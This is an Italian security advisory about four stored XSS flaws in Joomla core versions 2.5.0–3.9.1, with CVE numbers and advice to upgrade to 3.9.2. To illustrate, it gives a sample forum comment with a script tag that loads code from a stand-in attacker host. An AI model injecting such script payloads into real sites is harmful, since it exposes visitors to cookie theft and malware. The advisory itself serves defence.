JOOMLA 2.5.0 – 3.9.1
SCOPERTE QUATTRO VULNERABILITA’ XSS PERSISTENT NEL CORE
Fondamentale aggiornare alla versione 3.9.2!
Gli sviluppatori di Joomla hanno diffuso ieri la notizia di 4 vulnerabilità di tipo STORED XSS (Cross Site Scripting) nel Core del CMS. La vulnerabilità STORED XSS è anche definita PERSISTENT XSS ed è il tipo più grave di attacco Cross Site Scripting in quanto consente ad un attaccante remoto di iniettare nell’applicazione vulnerabile uno script malevolo che sarà eseguito da ogni visitatore della pagina compromessa in quanto avrà la caratteristica di essere permanente.
Se ad esempio la vulnerabilità fosse sul componente “Forum” di un sito di automobili storiche, un semplicissimo commento aggiunto da un attaccante che recitasse
“Ecco la mia ferrari d’epoca, clicca qui per vederla <script src=”http://sito_del_cattivo.js”> </script>”
(non si vedrebbe la parte che comincia con <script>) lancerebbe lo script dal sito del cattivo (quindi ospitato su un altro server) ogni volta che la pagina fosse caricata, quindi ad ogni nuovo visitatore del sito. A seconda di cosa lo script è stato programmato a fare potrebbe eseguire malware sul computer dei visitatori, potrebbe leggere il cookie di sessione di un utente su un sito di ecommerce, e fare molto altro. E il tutto in modo ignaro dall’utente.
Immagine tratta da www.incapsula.com
Le versioni di Joomla interessate dalle vulnerabilità sono quelle dalla 2.5.0 alla 3.9.1.
Di seguito elenchiamo le quattro vulnerabilità con la relativa attribuzione CVE e i dettagli delle stesse:
[20190101] – Core – Stored XSS in mod_banners (CVE-2019-6264)
[20190102] – Core – Stored XSS in com_contact (CVE-2019-6261)
[20190103] – Core – Stored XSS issue in the Global Configuration textfilter settings (CVE-2019-6263)
[20190104] – Core – Stored XSS issue in the Global Configuration help url (CVE-2019-6262)
MITIGATION / REMEDIATION
Per risolvere il problema gli sviluppatori di Joomla consigliano di passare alla ultima release disponibile rilasciata ieri, la 3.9.2. La release 3.9.2 è infatti un rilascio di sicurezza per le serie precedenti che sono vulnerabili ed include anche oltre 50 correzioni di bug e miglioramenti.
Ricordiamo che i CMS, tra cui Joomla e WordPress, sono i più presi di mira dai criminali informatici. Ci è dato sapere che prossimamente gli sviluppatori di Joomla rilasceranno la versione 4, mentre la 4 Alpha è già stata pubblicata con finalità di test (Fonte CERT-PA).
Qualora non si potesse aggiornare la versione del proprio CMS, la mitigation più comune suggerisce l’impiego di un WAF (Web Application Firewall).
Consigliamo in ogni caso di sottoporre periodicamente a Vulnerability Assessment i vostri portali Web..
Solo così sarete in grado di conoscere se il vostro sito è protetto dagli attacchi che quotidianamente avvengono contro i portali di ogni tipo. Spesso vengono attaccati anche solo per il puro gusto di farlo. Del resto utilizzando il motore di ricerca Shodan un criminale è oggi in grado di cercare tutti i siti Joomla con una determinata versione in modo molto semplice e veloce e quindi poi avrebbe l’imbarazzo della scelta sul quale colpire.
Ad esempio nell’immagine che mostriamo abbiamo fatto una semplice ricerca delle versioni Joomla 2.5.
Avremmo l’imbarazzo su 3.084 portali.
Potete seguire alert e notizie in tempo reale su Vulnerabilità, Exploits, Attacchi, Codici Malevoli e Cyber-Crime sul nostro profilo Twitter https://twitter.com/euroinformatica o su quello della nostra Security Unit “CyberTeam” su https://twitter.com/CyberTeamClub